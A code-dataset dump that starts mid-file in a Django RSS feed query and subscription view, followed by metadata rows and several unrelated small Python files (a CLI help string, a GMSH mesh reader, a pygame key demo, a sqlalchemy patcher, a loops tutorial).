return HttpResponseNotAllowed(permitted_methods) # pragma: no cover
if request.method == 'POST':
return _feeds_query_post(request)
def feed_subscribe(request):
permitted_methods = {'POST', 'PUT', 'DELETE'}
if request.method not in permitted_methods:
return HttpResponseNotAllowed(permitted_methods) # pragma: no cover
if request.method == 'POST':
return _feed_subscribe_post(request)
elif request.method == 'PUT':
return _feed_subscribe_put(request)
elif request.method == 'DELETE':
return _feed_subscribe_delete(request)
def _save_feed(url):
response = None
try:
response = rss_requests.get(url)
response.raise_for_status()
except requests.exceptions.RequestException:
raise QueryException('feed not found', 404)
with transaction.atomic():
d = feed_handler.text_2_d(response.text)
feed = feed_handler.d_feed_2_feed(d.feed, url)
feed.with_subscription_data()
feed.save()
feed_entries = []
for d_entry in d.get('entries', []):
feed_entry = None
try:
feed_entry = feed_handler.d_entry_2_feed_entry(d_entry)
except ValueError: # pragma: no cover
continue
feed_entry.feed = feed
feed_entries.append(feed_entry)
models.FeedEntry.objects.bulk_create(feed_entries)
return feed
def _feed_get(request):
context = Context()
context.parse_request(request)
context.parse_query_dict(request.GET)
url = request.GET.get('url')
if not url:
return HttpResponseBadRequest('\'url\' missing')
url = url_normalize(url)
field_maps = None
try:
fields = query_utils.get_fields__query_dict(request.GET)
field_maps = query_utils.get_field_maps(fields, _OBJECT_NAME)
except QueryException as e: # pragma: no cover
return HttpResponse(e.message, status=e.httpcode)
feed = None
try:
feed = models.Feed.annotate_subscription_data(
models.Feed.objects.all(), request.user).get(feed_url=url)
except models.Feed.DoesNotExist:
try:
feed = _save_feed(url)
except QueryException as e:
return HttpResponse(e.message, status=e.httpcode)
ret_obj = query_utils.generate_return_object(field_maps, feed, context)
content, content_type = query_utils.serialize_content(ret_obj)
return HttpResponse(content, content_type)
def _feeds_query_post(request):
context = Context()
context.parse_request(request)
context.parse_query_dict(request.GET)
if not request.body:
return HttpResponseBadRequest('no HTTP body') # pragma: no cover
json_ = None
try:
json_ = ujson.loads(request.body)
except ValueError: # pragma: no cover
return HttpResponseBadRequest('HTTP body cannot be parsed')
if type(json_) is not dict:
return HttpResponseBadRequest('JSON body must be object') # pragma: no cover
count = None
try:
count = query_utils.get_count(json_)
except QueryException as e: # pragma: no cover
return HttpResponse(e.message, status=e.httpcode)
skip = None
try:
skip = query_utils.get_skip(json_)
except QueryException as e: # pragma: no cover
return HttpResponse(e.message, status=e.httpcode)
sort = None
try:
sort = query_utils.get_sort(json_, _OBJECT_NAME)
except QueryException as e: # pragma: no cover
return HttpResponse(e.message, status=e.httpcode)
search = None
try:
search = query_utils.get_search(context, json_, _OBJECT_NAME)
except QueryException as e: # pragma: no cover
return HttpResponse(e.message, status=e.httpcode)
field_maps = None
try:
fields = query_utils.get_fields__json(json_)
field_maps = query_utils.get_field_maps(fields, _OBJECT_NAME)
except QueryException as e: # pragma: no cover
return HttpResponse(e.message, status=e.httpcode)
return_objects = None
try:
return_objects = query_utils.get_return_objects(json_)
except QueryException as e: # pragma: no cover
return HttpResponse(e.message, status=e.httpcode)
return_total_count = None
try:
return_total_count = query_utils.get_return_total_count(json_)
except QueryException as e: # pragma: no cover
return HttpResponse(e.message, status=e.httpcode)
feeds = models.Feed.annotate_search_vectors(models.Feed.annotate_subscription_data(
models.Feed.objects.all(), request.user)).filter(*search)
ret_obj = {}
if return_objects:
objs = []
for feed in feeds.order_by(
*sort)[skip:skip + count]:
obj = query_utils.generate_return_object(
field_maps, feed, context)
objs.append(obj)
ret_obj['objects'] = objs
if return_total_count:
ret_obj['totalCount'] = feeds.count()
content, content_type = query_utils.serialize_content(ret_obj)
return HttpResponse(content, content_type)
def _feed_subscribe_post(request):
user = request.user
url = request.GET.get('url')
if not url:
return HttpResponseBadRequest('\'url\' missing')
url = url_normalize(url)
feed = None
try:
feed = models.Feed.objects.get(feed_url=url)
except models.Feed.DoesNotExist:
try:
feed = _save_feed(url)
except QueryException as e:
return HttpResponse(e.message, status=e.httpcode)
custom_title = request.GET.get('customtitle')
existing_subscription_list = list(models.SubscribedFeedUserMapping.objects.filter(
user=user).values_list('feed__feed_url', 'custom_feed_title'))
existing_feed_urls = frozenset(t[0] for t in existing_subscription_list)
existing_custom_titles = frozenset(
t[1] for t in existing_subscription_list if t[1] is not None)
if custom_title is not None and custom_title in existing_custom_titles:
return HttpResponse('custom title already used', status=409)
if feed.feed_url in existing_feed_urls:
return HttpResponse('user already subscribed', status=409)
read_mapping_generator = archived_feed_entry_util.read_mapping_generator_fn(
feed, user)
with transaction.atomic():
models.SubscribedFeedUserMapping.objects.create(
user=user, feed=feed, custom_feed_title=custom_title)
archived_feed_entry_util.mark_archived_entries(read_mapping_generator)
return HttpResponse(status=204)
def _feed_subscribe_put(request):
user = request.user
url = request.GET.get('url')
if not url:
return HttpResponseBadRequest('\'url\' missing')
url = url_normalize(url)
custom_title = request.GET.get('customtitle')
subscribed_feed_mapping = None
try:
subscribed_feed_mapping = models.SubscribedFeedUserMapping.objects.get(
user=user, feed__feed_url=url)
except models.SubscribedFeedUserMapping.DoesNotExist:
return HttpResponseNotFound('not subscribed')
if custom_title is not None:
if models.SubscribedFeedUserMapping.objects.exclude(uuid=subscribed_feed_mapping.uuid).filter(user=user, custom_feed_title=custom_title).exists():
return HttpResponse('custom title already used', status=409)
subscribed_feed_mapping.custom_feed_title = custom_title
subscribed_feed_mapping.save(update_fields=['custom_feed_title'])
return HttpResponse(status=204)
def _feed_subscribe_delete(request):
url = request.GET.get('url')
if not url:
return HttpResponseBadRequest('\'url\' missing')
url = url_normalize(url)
count, _ = models.SubscribedFeedUserMapping.objects.filter(
user=request.user, feed__feed_url=url).delete()
if count < 1:
return HttpResponseNotFound('user not subscribed')
return HttpResponse(status=204)
| 30.681818 | 154 | 0.692877 | 1,063 | 8,775 | 5.480715 | 0.132643 | 0.055613 | 0.033471 | 0.039478 | 0.527291 | 0.479231 | 0.442499 | 0.427738 | 0.410917 | 0.396842 | 0 | 0.004099 | 0.221538 | 8,775 | 285 | 155 | 30.789474 | 0.848778 | 0.028946 | 0 | 0.455882 | 0 | 0 | 0.043269 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044118 | false | 0 | 0.039216 | 0 | 0.259804 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5daabddd78accd0c119c7d00f383e8e6adda241 | 2,954 | py | Python | hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/settings.py | hallohubo/DjangoDocterAPI | 2d86d17c718affa968c0b2d4f9590aa08d43716e | [
"Apache-2.0"
] | 89 | 2015-04-10T14:34:05.000Z | 2021-11-08T09:17:09.000Z | hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/settings.py | hallohubo/DjangoDocterAPI | 2d86d17c718affa968c0b2d4f9590aa08d43716e | [
"Apache-2.0"
] | 13 | 2015-03-17T15:44:41.000Z | 2020-11-19T03:07:13.000Z | hbruraldoctor/hbvirtual/lib/python3.7/site-packages/Naked/settings.py | hallohubo/DjangoDocterAPI | 2d86d17c718affa968c0b2d4f9590aa08d43716e | [
"Apache-2.0"
] | 19 | 2015-05-13T09:18:12.000Z | 2021-04-28T10:35:39.000Z | #!/usr/bin/env python
# encoding: utf-8
#------------------------------------------------------------------------------
# Application Name
#------------------------------------------------------------------------------
app_name = "naked"
#------------------------------------------------------------------------------
# Version Number
#------------------------------------------------------------------------------
major_version = "0"
minor_version = "1"
patch_version = "31"
#------------------------------------------------------------------------------
# Debug Flag (switch to False for production release code)
#------------------------------------------------------------------------------
debug = False
#------------------------------------------------------------------------------
# Usage String
#------------------------------------------------------------------------------
usage = """
Usage: naked <primary command> [secondary command] [option(s)] [argument(s)]
--- Use 'naked help' for detailed help ---
"""
#------------------------------------------------------------------------------
# Help String
#------------------------------------------------------------------------------
help = """
---------------------------------------------------
Naked
A Python command line application framework
Copyright 2014 Christopher Simpkins
MIT license
---------------------------------------------------
ABOUT
The Naked framework includes the "naked" executable and the Python toolshed library. The naked executable is a command line tool for application development, testing, profiling, and deployment. The toolshed library contains numerous useful tools for application development that can be used through standard Python module imports. These features are detailed in the documentation (link below).
USAGE
The naked executable syntax is:
naked <primary command> [secondary command] [option(s)] [argument(s)]
The <primary command> is mandatory and includes one of the commands in the following section. The [bracketed] syntax structure is optional and dependent upon the primary command that you use. Use the command 'naked <primary command> help' for details about a command.
PRIMARY COMMANDS SECONDARY COMMANDS
args help
build help
classify help
dist all•help•sdist•swheel•wheel•win
help - none -
locate main•help•settings•setup
make help
profile help
pyh help
test nose•pytest•tox•unittest
usage - none -
version - none -
HELP
To learn more about a primary command, use the following syntax:
naked <primary command> help
DOCUMENTATION
http://docs.naked-py.com
SOURCE REPOSITORY
https://github.com/chrissimpkins/naked
ISSUE REPORTING
https://github.com/chrissimpkins/naked/issues
"""
| 33.954023 | 396 | 0.474611 | 269 | 2,954 | 5.237918 | 0.486989 | 0.069553 | 0.053939 | 0.039745 | 0.117814 | 0.072392 | 0.072392 | 0.072392 | 0.072392 | 0 | 0 | 0.003701 | 0.17671 | 2,954 | 86 | 397 | 34.348837 | 0.571135 | 0.314827 | 0 | 0.088889 | 0 | 0.066667 | 0.932203 | 0.090229 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022222 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5de3b649cde237814d8eb0d0baa2f698e762515 | 7,959 | py | Python | fempagno/modules/motoremesh.py | giovap95/metis-fem | f8a67698d1531a862e541f79229c0e4486edde6c | [
"MIT"
] | null | null | null | fempagno/modules/motoremesh.py | giovap95/metis-fem | f8a67698d1531a862e541f79229c0e4486edde6c | [
"MIT"
] | 2 | 2020-05-08T21:51:44.000Z | 2020-05-13T13:41:41.000Z | fempagno/modules/motoremesh.py | giovap95/metis-fem | f8a67698d1531a862e541f79229c0e4486edde6c | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 18:54:01 2020
@author: giova
"""
import numpy as np
import sys
import meshio
# Creates a mesh class
class Mesh:
def __init__(self):
self.el_def = None
self.material = None
self.conn_table = None
self.cds_table = None
self.elements = None # globdof.shape[0]
self.nodes = None # max(max(globdof[:,-1]),max(globdof[:,-2]))+1
self.nodesperelem = None
self.dofspernode = None
self.totdofs = None
self.d = None # spatial dimensions
#---------------------------------------------------------------------------
# Functions below do not belong to mesh Class
#---------------------------------------------------------------------------
def el_mat(mesh,i):
""" Returns the material of the current element,
as defined in the material dictionary"""
el_mat = mesh.material[i]
return el_mat
def el_type(mesh, i):
""" Returns the element type of the current element""" #TODO: eliminate this function
el_type = mesh.elementType[i]
if el_type!=0 and el_type!=1:
print('\n','Element', i, 'ERROR! Element type not recognised')
sys.exit()
return el_type
def coordinates(mesh,i):
rows = mesh.conn_table[i]
cds = mesh.points[rows]
return cds
def NodesInElement(mesh,i):
NodesInElement=mesh.conn_table[i]
return NodesInElement
def get_key(my_dict,val):
""" Function to return key for any value. """
# This function returns the key if the first item in the array value
# of a dictionary is equal to val. If my_dict contains
# 'Fixed': array([667, 0]), get_key(my_dict,667) returns Fixed
for key, value in my_dict.items():
if val == value[0]:
return key
print("\n value",val,"doesn't exist as \'key\': array([value, 0]) in\n", my_dict)
sys.exit()
def GMSH(mesh_file):
sys.path.append("PRE")
# create a mesh object
mesh = meshio.read("D:/Documents/GitHub/metis-fem/fempagno/PRE/"+mesh_file+".msh")
# check if the mesh object contains attributes needed by pyFEM
# - pyFEM_MeshAttributes is a list of all the mesh attributes needed by pyFEM
# - we are going to reuse the attribute points and add the other attribute from pyFEM_MeshAttributes
pyFEM_MeshAttributes = ["d", "dofsNode", "elements", "elementMaterialTag", "elementType", "points"]
for attribute in pyFEM_MeshAttributes:
if attribute in dir(mesh):
if attribute == "points":
pass
else:
print("Error: meshio already contains the attribute",attribute)
print(" ...do something!")
sys.exit()
# add the missing attributes from pyFEM_MeshAttributes
# Note: it is assumed that the mesh is two-dimensional and that the
# domain is dicretized with triangular elements and that there are
# two degrees of freedom per node (i.e., this is a plain equilibrium problem)
mesh.elements = 0
mesh.nodes = len(mesh.points)
mesh.dofspernode = 2
mesh.totdofs=mesh.nodes*mesh.dofspernode
mesh.d = 2
mesh.dofsNode = 2
mesh.conn_table = []
mesh.material = []
mesh.el_def = []
mesh.elementType = []
mesh.material = []
meshing = False
quad = False
try:
dummy = mesh.cell_data_dict['gmsh:physical']['quad']
quad = True
except KeyError:
# print("No quadrilateral elements in mesh")
pass
triangle = False
try:
dummy = mesh.cell_data_dict['gmsh:physical']['triangle']
triangle = True
except KeyError:
# print("No triangular elements in mesh")
pass
if quad:
meshing = True
quads = len(mesh.cell_data_dict["gmsh:physical"]["quad"])
mesh.elements += quads
for t in range(quads):
mesh.conn_table.append(mesh.cells_dict["quad"][t])
materialTag=mesh.cell_data_dict["gmsh:physical"]["quad"][t]
# we assume that a physical surface in 2D is only used to identify
# elements with the same material property.
# GMSH identifies a physical group by a tag and a name.
# Tags are stores in cell_data_dict for each element.
# Tags and names are linked in field_data
# The function get_key returns the name (=key) for a given tag
key = get_key(mesh.field_data, materialTag)
mesh.material.append(key)
mesh.elementType.append('quad')
if triangle:
meshing = True
triangles = len(mesh.cell_data_dict["gmsh:physical"]["triangle"])
mesh.elements += triangles
for t in range(triangles):
mesh.conn_table.append(mesh.cells_dict["triangle"][t])
materialTag=mesh.cell_data_dict["gmsh:physical"]["triangle"][t]
# we assume that a physical surface in 2D is only used to identify
# elements with the same material property.
# GMSH identifies a physical group by a tag and a name.
# Tags are stores in cell_data_dict for each element.
# Tags and names are linked in field_data
# The function get_key returns the name (=key) for a given tag
key = get_key(mesh.field_data, materialTag)
mesh.material.append(key)
mesh.elementType.append('triangle')
if not meshing:
print("something went wrong: could not extract mesh data")
sys.exit()
mesh.points = mesh.points[:, 0:mesh.d] #resize to the number of spatial dimensions in the problem
# TODO: ...check that all the necessary attributes have been defined in a correct manner
# library of the possible elements
mesh.element_lib = { 'spring' : {'stiffness matrix' : {'evaluation' : 'closed form',
'domain' : None,
'rule' : None,
'points' : None}},
'bar' : {'stiffness matrix' : {'evaluation' : 'numerical integration',
'domain' : 'line',
'rule' : 'Gauss Legendre',
'points' : 2}},
'triangle' : {'stiffness matrix' : {'evaluation' : 'numerical integration',
'domain' : 'triangle',
'rule' : 'Gauss Legendre',
'points' : 1}},
'quad' : {'stiffness matrix' : {'evaluation' : 'numerical integration',
'domain' : 'quad',
'rule' : 'Gauss Legendre',
'points' : 4}}
}
return mesh
| 33.1625 | 107 | 0.489257 | 819 | 7,959 | 4.678877 | 0.274725 | 0.016701 | 0.025052 | 0.025052 | 0.306628 | 0.29358 | 0.253653 | 0.211378 | 0.190501 | 0.169102 | 0 | 0.008058 | 0.407463 | 7,959 | 239 | 108 | 33.301255 | 0.804495 | 0.280437 | 0 | 0.191304 | 0 | 0 | 0.138163 | 0.007597 | 0 | 0 | 0 | 0.004184 | 0 | 1 | 0.06087 | false | 0.026087 | 0.026087 | 0 | 0.147826 | 0.043478 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e0321b867fbd3540821c3d571734424765569b | 326 | py | Python | setup.py | mephizzle/python-funkyfunc | 5b7b9edc817830348227e8c7f9178d26ecc9991f | [
"Apache-2.0"
] | null | null | null | setup.py | mephizzle/python-funkyfunc | 5b7b9edc817830348227e8c7f9178d26ecc9991f | [
"Apache-2.0"
] | null | null | null | setup.py | mephizzle/python-funkyfunc | 5b7b9edc817830348227e8c7f9178d26ecc9991f | [
"Apache-2.0"
] | null | null | null | from distutils.core import setup
setup(
author='Marco Westerhof',
author_email='mephistolomaniac@gmail.com',
url='https://github.com/mephizzle/python-funkyfunc',
name='FunkyFunk',
version='0.0.2-dev',
packages=['funkyfunc'],
license='Apache 2.0',
long_description=open('README.txt').read(),
)
| 25.076923 | 56 | 0.677914 | 40 | 326 | 5.475 | 0.825 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018051 | 0.150307 | 326 | 12 | 57 | 27.166667 | 0.772563 | 0 | 0 | 0 | 0 | 0 | 0.407975 | 0.079755 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
e5e10452d84b6a103a29913ec774bc796c7a58d7 | 35 | py | Python | spartan/examples/sklearn/linear_model/__init__.py | GabrielWen/spartan | ce3bf7f2bb551d7f996a1884acef819b620cc854 | [
"Apache-2.0"
] | 156 | 2015-01-10T21:54:25.000Z | 2021-10-17T14:13:57.000Z | spartan/examples/sklearn/linear_model/__init__.py | GabrielWen/spartan | ce3bf7f2bb551d7f996a1884acef819b620cc854 | [
"Apache-2.0"
] | 8 | 2015-01-05T16:34:18.000Z | 2015-12-11T08:12:28.000Z | spartan/examples/sklearn/linear_model/__init__.py | GabrielWen/spartan | ce3bf7f2bb551d7f996a1884acef819b620cc854 | [
"Apache-2.0"
] | 24 | 2015-01-10T21:55:48.000Z | 2021-04-14T08:09:34.000Z | from .base import LinearRegression
| 17.5 | 34 | 0.857143 | 4 | 35 | 7.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114286 | 35 | 1 | 35 | 35 | 0.967742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 5 |
e5e256e472aa9a2645b2b2a6d05bcb536688a4a9 | 1,116 | py | Python | pygame/key-event- get-changed-states/main-using-get_pressed.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 140 | 2017-02-21T22:49:04.000Z | 2022-03-22T17:51:58.000Z | pygame/key-event- get-changed-states/main-using-get_pressed.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 5 | 2017-12-02T19:55:00.000Z | 2021-09-22T23:18:39.000Z | pygame/key-event- get-changed-states/main-using-get_pressed.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 79 | 2017-01-25T10:53:33.000Z | 2022-03-11T16:13:57.000Z | #!/usr/bin/env python3
#
# https://stackoverflow.com/a/48034477/1832058
#
import pygame
pygame.init()
screen = pygame.display.set_mode((300, 200))
pressed = pygame.key.get_pressed()
clock = pygame.time.Clock()
is_running = True
while is_running:
for event in pygame.event.get():
if event.type == pygame.QUIT:
is_running = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
is_running = False
last_pressed = pressed
pressed = pygame.key.get_pressed()
# --- get only keys which changed state ---
changed = [idx for idx in range(len(pressed)) if pressed[idx] != last_pressed[idx]]
print(changed)
# or
changed = [idx for idx, (a, b) in enumerate(zip(last_pressed, pressed)) if a != b]
print(changed)
# --- True/False for all keys ---
changed = [pressed[idx] != last_pressed[idx] for idx in range(len(pressed))]
print(changed)
# or
changed = [a != b for a, b in zip(last_pressed, pressed)]
print(changed)
# ---
clock.tick(25)
pygame.quit()
| 21.461538 | 87 | 0.612007 | 150 | 1,116 | 4.466667 | 0.373333 | 0.08209 | 0.080597 | 0.056716 | 0.222388 | 0.077612 | 0.077612 | 0 | 0 | 0 | 0 | 0.028812 | 0.253584 | 1,116 | 51 | 88 | 21.882353 | 0.77551 | 0.135305 | 0 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0.16 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e25a60a68dadc256cd1d15a2436325f5c9ecdb | 828 | py | Python | epsagon/modules/sqlalchemy.py | Dryja/epsagon-python | 505b09268820593903afdce26e1bab7f64adc23b | [
"MIT"
] | 55 | 2018-09-30T11:46:01.000Z | 2022-03-15T13:37:26.000Z | epsagon/modules/sqlalchemy.py | Dryja/epsagon-python | 505b09268820593903afdce26e1bab7f64adc23b | [
"MIT"
] | 323 | 2018-10-04T15:42:08.000Z | 2022-02-20T11:26:40.000Z | epsagon/modules/sqlalchemy.py | Dryja/epsagon-python | 505b09268820593903afdce26e1bab7f64adc23b | [
"MIT"
] | 20 | 2018-10-11T14:47:16.000Z | 2022-01-20T11:07:29.000Z | """
sqlalchemy patcher module
"""
from __future__ import absolute_import
from epsagon.modules.general_wrapper import wrapper
from ..events.sqlalchemy import SqlAlchemyEventFactory
from ..utils import patch_once
def _wrapper(wrapped, instance, args, kwargs):
"""
General wrapper for sqlalchemy instrumentation.
:param wrapped: wrapt's wrapped
:param instance: wrapt's instance
:param args: wrapt's args
:param kwargs: wrapt's kwargs
:return: None
"""
return wrapper(SqlAlchemyEventFactory, wrapped, instance, args, kwargs)
def patch():
"""
patch module.
:return: None
"""
patch_once(
'sqlalchemy.orm.session',
'Session.__init__',
_wrapper
)
patch_once(
'sqlalchemy.orm.session',
'Session.close',
_wrapper
)
| 21.230769 | 75 | 0.665459 | 87 | 828 | 6.149425 | 0.367816 | 0.04486 | 0.071028 | 0.093458 | 0.134579 | 0.134579 | 0 | 0 | 0 | 0 | 0 | 0 | 0.237923 | 828 | 38 | 76 | 21.789474 | 0.847861 | 0.286232 | 0 | 0.352941 | 0 | 0 | 0.137996 | 0.083176 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.235294 | 0 | 0.411765 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e5e3335794c38081b262ad2769536aeb3e3e96ca | 471 | py | Python | access/website_tests/make_profile.py | ldbiz/ukwa-services | afa30cf631a3464e53f41244b989e32984c40294 | [
"Apache-2.0"
] | 2 | 2020-05-12T18:01:21.000Z | 2021-05-18T21:47:32.000Z | access/website_tests/make_profile.py | ldbiz/ukwa-services | afa30cf631a3464e53f41244b989e32984c40294 | [
"Apache-2.0"
] | 53 | 2020-01-23T16:10:53.000Z | 2022-03-30T16:59:17.000Z | access/website_tests/make_profile.py | ldbiz/ukwa-services | afa30cf631a3464e53f41244b989e32984c40294 | [
"Apache-2.0"
] | 5 | 2020-01-20T17:28:27.000Z | 2022-02-08T21:30:12.000Z | def make_profile():
from selenium import webdriver
fp = webdriver.FirefoxProfile()
fp.set_preference("network.proxy.http", "pywb");
fp.set_preference("network.proxy.http_port", 8080);
fp.set_preference("network.proxy.share_proxy_settings", True);
fp.set_preference("network.proxy.ssl", "pywb");
fp.set_preference("network.proxy.ssl_port", 8080);
fp.set_preference("network.proxy.type", 1);
fp.update_preferences()
return fp.path
| 33.642857 | 66 | 0.713376 | 62 | 471 | 5.225806 | 0.435484 | 0.092593 | 0.277778 | 0.407407 | 0.617284 | 0.617284 | 0.216049 | 0 | 0 | 0 | 0 | 0.022222 | 0.140127 | 471 | 13 | 67 | 36.230769 | 0.777778 | 0 | 0 | 0 | 0 | 0 | 0.297872 | 0.168085 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.090909 | 0 | 0.272727 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5e4afd5dbe24702344b3fb95577c4c8061e708c | 415 | py | Python | app/component/sink/resolver.py | melphi/kafkaform | 391c4c70b6aff9fd5ad703dcf4b6e863e92d53b6 | [
"MIT"
] | null | null | null | app/component/sink/resolver.py | melphi/kafkaform | 391c4c70b6aff9fd5ad703dcf4b6e863e92d53b6 | [
"MIT"
] | null | null | null | app/component/sink/resolver.py | melphi/kafkaform | 391c4c70b6aff9fd5ad703dcf4b6e863e92d53b6 | [
"MIT"
] | null | null | null | from typing import Optional
from app import model, client
from app.component.connect import resolver
class SinkResolver(resolver.BaseConnectResolver):
def __init__(self, *, connect_client: client.ConnectClient):
super().__init__(connect_client=connect_client, connector_type=model.RESOURCE_SINK)
def _get_schema(self, target: model.SpecItem) -> Optional[model.SchemaParams]:
return None
| 31.923077 | 91 | 0.775904 | 49 | 415 | 6.265306 | 0.591837 | 0.127036 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.139759 | 415 | 12 | 92 | 34.583333 | 0.859944 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.375 | 0.125 | 0.875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 4 |
e5e4d509b89cb0862f92845dd6ce191e2a31dfb4 | 187 | py | Python | scrapy_cookies/signals.py | scrapedia/scrapy-cookies | 9741c767005254f5c427d3938ccad9ad74f93c2a | [
"BSD-3-Clause"
] | 13 | 2019-05-29T03:31:58.000Z | 2021-09-30T14:53:45.000Z | scrapy_cookies/signals.py | scrapedia/scrapy-cookies | 9741c767005254f5c427d3938ccad9ad74f93c2a | [
"BSD-3-Clause"
] | 18 | 2019-06-02T12:43:05.000Z | 2022-03-08T01:07:21.000Z | scrapy_cookies/signals.py | scrapedia/scrapy-cookies | 9741c767005254f5c427d3938ccad9ad74f93c2a | [
"BSD-3-Clause"
] | 11 | 2019-08-14T12:06:38.000Z | 2021-08-13T00:24:35.000Z | """
Scrapy-Cookies signals
These signals are documented in docs/topics/signals.rst. Please don't add new
signals here without documenting them there.
"""
cookies_invalidated = object()
| 20.777778 | 77 | 0.780749 | 26 | 187 | 5.576923 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.13369 | 187 | 8 | 78 | 23.375 | 0.895062 | 0.780749 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
e5e53846e2bb66fb7964f5329a489cc90405aafd | 881 | py | Python | Python/BasicTutorials/loops.py | ronkitay/Rons-Tutorials | c0459c57cc24b546847ec24afa94d2c1e5373bd4 | [
"MIT"
] | null | null | null | Python/BasicTutorials/loops.py | ronkitay/Rons-Tutorials | c0459c57cc24b546847ec24afa94d2c1e5373bd4 | [
"MIT"
] | null | null | null | Python/BasicTutorials/loops.py | ronkitay/Rons-Tutorials | c0459c57cc24b546847ec24afa94d2c1e5373bd4 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
from rons_tutorial_formatting import *
print_block_separator()
x = 1
while x < 10:
print x,
x += 1
end_block(True)
start_block()
words = ['hello', 'world', 'have', 'a', 'nice', 'day']
for word in words:
if word.isalpha() and word[0] == 'h':
print word,
elif len(word) == 1:
print word.upper(),
else:
shortened_word = word[:-1]
print shortened_word.title(),
end_block(True)
start_block()
for value_in_range in range(12, 98, 3):
print value_in_range, ',',
end_block(True)
start_block()
the_range = range(1, 10)
for j in the_range:
if j > 9:
print j
break
else:
print "The range `%s` does not contain anything greater than 9" % the_range
print
for j in range(0, 1000, 10):
if j < 500:
continue
print j, ',',
